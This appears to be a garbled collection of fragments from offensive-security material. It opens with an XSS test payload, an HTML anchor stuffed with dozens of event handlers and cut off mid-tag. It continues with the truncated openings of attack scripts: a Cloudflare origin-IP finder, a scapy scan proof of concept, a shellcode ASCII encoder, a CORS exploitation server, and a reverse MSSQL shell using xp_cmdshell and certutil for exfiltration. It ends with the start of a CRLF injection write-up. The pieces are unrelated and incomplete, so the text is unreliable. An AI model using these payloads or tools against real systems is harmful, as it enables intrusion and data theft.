| <a onafterprint="console.log(244599)" onbeforeprint="console.log(309354)" onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)" onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)" ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)" onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)" onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)" oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)" oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)" onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)" onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)" ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)" o |
| import os | |
| import base64 | |
| import json | |
| from Crypto.Cipher import AES | |
| from phpserialize import loads | |
| def decrypt(payload): | |
| data = json.loads(base64.b64decode(payload)) |
| # Python3 code below | |
| import os | |
| import base64 | |
| import json | |
| from Crypto.Cipher import AES | |
| from phpserialize import loads | |
| import hashlib | |
| import hmac | |
| #!/usr/bin/env python3 | |
| import censys.certificates | |
| import censys.ipv4 | |
| from sys import argv | |
| UID = "**CHANGE**" | |
| SECRET = "**CHANGE**" | |
| def is_cloudflare(dn): |
| #!/usr/bin/env python | |
| # DiabloHorn - https://diablohorn.com | |
| # scan target IP from an interface with no IP configured | |
| # POC - scapy | |
| # pkt = Ether(dst='00:0c:29:f6:a5:65',src='00:08:19:2c:e0:15') / IP(dst='172.16.218.178',src='172.16.218.255') / TCP(dport=445,flags='S') | |
| # sendp(pkt,iface='eth0') | |
| import sys | |
| from scapy.all import * |
| #!/usr/bin/python | |
| # | |
| # Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique, | |
| # and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler` | |
| # utility (as described in: Hacking - The Art of Exploitation). | |
| # | |
| # Basically one gives to the program's output a binary encoded shellcode, | |
| # and it yields on the output it's ASCII encoded form. | |
| # | |
| # This payload will at the beginning align the stack by firstly moving |
| ::########################################################################################################################## | |
| :: | |
| :: This script can ruin your day, if you run it without fully understanding what it does, you don't know what you are doing, | |
| :: | |
| :: OR BOTH!!! | |
| :: | |
| :: YOU HAVE BEEN WARNED!!!!!!!!!! | |
| :: | |
| :: This script is provided "AS IS" with no warranties, and confers no rights. | |
| :: Feel free to challenge me, disagree with me, or tell me I'm completely nuts in the comments section, |
| #!/usr/bin/env python | |
| from sys import argv | |
| import BaseHTTPServer | |
| import ssl | |
| class CORSHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): | |
| def do_OPTIONS(self): | |
| self.send_response(200, "ok") | |
| #self.send_header('Access-Control-Allow-Origin', '*') |
| import sys | |
| import requests | |
| import threading | |
| import HTMLParser | |
| from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler | |
| ''' | |
| Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration | |
| Author: @xassiz | |
| ''' |
I spent the weekend meeting hackers in Vegas, and I got talking to one of them about CRLF Injection. They'd not seen many CRLF Injection vulnerabilities in the wild, so I thought I'd write up an example that's similar to something I found a few months ago.
If you're looking for bugs legally through a program like hackerone, or you're a programmer wanting to write secure PHP: this might be useful to you.